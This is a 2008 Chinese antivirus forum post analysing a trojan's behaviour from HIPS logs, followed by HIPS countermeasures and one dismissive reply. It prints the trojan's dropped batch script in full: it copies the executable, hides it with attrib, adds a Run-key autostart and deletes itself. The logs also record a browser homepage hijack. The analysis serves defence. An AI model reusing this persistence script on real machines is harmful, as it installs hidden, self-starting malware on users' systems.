‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[原创] Generic.Malware.SCsp.2C99A774

沁妍万岁

妖媚狐狸精

剑盟病毒缉毒小组

Rank: 10Rank: 10Rank: 10

UID
267994 
积分
38 
活跃度
94  
楼主 发表于 2008-9-30 21:18  只看该作者

Generic.Malware.SCsp.2C99A774

病毒名称:BitDefender:Generic.Malware.SCsp.2C99A774
               Kaspersky:-
               NOD32v2:probably unknown NewHeur_PE
               Rising:Trojan.Win32.VB.zva
VT扫描时间:09.29.2008 19:47:35 (CET)
EQS Lab编号:080930109
EQS Lab地址:http://hi.baidu.com/eqsyssecurity
病毒大小:28.0 KB (28,672 字节)
MD5码:F85362B22F5AC46B9674DA2FEBB5D631
病毒类型: 特洛伊木马
主要传播方式: 网络
测试平台: WinXP SP3系统 (默认Shell为BBlean)      EQSecurity(HIPS) 实机
危害程度:★★★☆☆

病毒行为:

运行后向所在目录释放BAT并调用
引用:
2008-09-30 20:35:27    运行应用程序      
进程路径:F:\Once\15\15.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c F:\Once\15\Dx.bat
触发规则:高优先规则->In Side->%windir%\system32\cmd.exe

BAT内容:
@ECHO off
color 0A
copy 15.exe c:\notoped.exe >nul
attrib +r +s +h c:\notoped.exe >nul
@REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v pagofile /t REG_SZ /d c:\notoped.exe /f
del %0
将自身复制到C:\notoped.exe
引用:
2008-09-30 20:35:27    创建文件      
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\notoped.exe
触发规则:所有程序规则->文件阻止及保护->?:\*.exe
创建txt
引用:
2008-09-30 20:35:40    创建文件      
进程路径:F:\Once\15\15.exe
文件路径:C:\text.txt
触发规则:所有程序规则->文件夹保护->C:\*
添加附加属性
引用:
2008-09-30 20:36:19    运行应用程序      
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\attrib.exe
命令行:+r +s +h c:\notoped.exe
触发规则:所有程序规则->系统工具->%windir%\system32\attrib.exe
添加启动项
引用:
2008-09-30 20:36:31    运行应用程序      
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v pagofile /t REG_SZ /d c:\notoped.exe /f
触发规则:所有程序规则->系统工具->%windir%\system32\reg.exe
创建快捷方式
引用:
2008-09-30 20:36:44    创建文件      
进程路径:F:\Once\15\15.exe
文件路径:C:\Documents and Settings\Administrator\桌面\Internet Explorer.lnk
触发规则:所有程序规则->Documents and Settings->?:\Documents and Settings\*\桌面\*
修改主页
引用:
2008-09-30 20:36:57    修改注册表内容      
进程路径:F:\Once\15\15.exe
注册表路径:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
注册表名称:Start Page
更改后:http://www.dxcpm.com/?44_20080930
更改前:http://www.shendu.com/
触发规则:所有程序规则->IE浏览器相关->*\Software\Microsoft\Internet explorer\Main
联网行为:




关键行为:

调用CMD

向C:\创建exe



HIPS防范对策:


阻止陌生程序调用CMD  attrib.exe

阻止陌生程序向C:\创建exe

阻止陌生程序修改首页


附件: 您所在的用户组无法下载或查看附件
沁妍病毒行为分析室

访问我的网盘

TOP

ujuj127

共赏四书意

Rank: 3Rank: 3

UID
128939 
积分
182 
活跃度
456  
沙发 发表于 2008-10-3 18:53  只看该作者
你分析来分析去,分析出了什么名堂?
这里是HIPS区,我谢谢你好吗?
http://ujuj127.ys168.com/

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题

剑盟资讯 - 反病毒资讯门户|扑奔PPT - 扑奔PPT社区|网湛门户 - 湛江本地门户

鄂ICP备08102315号|粤湛网安备4408002113号

广东剑盟网络科技工作室 © 2004 - 2008 All Rights Reserved.

Powered by Discuz! Licensed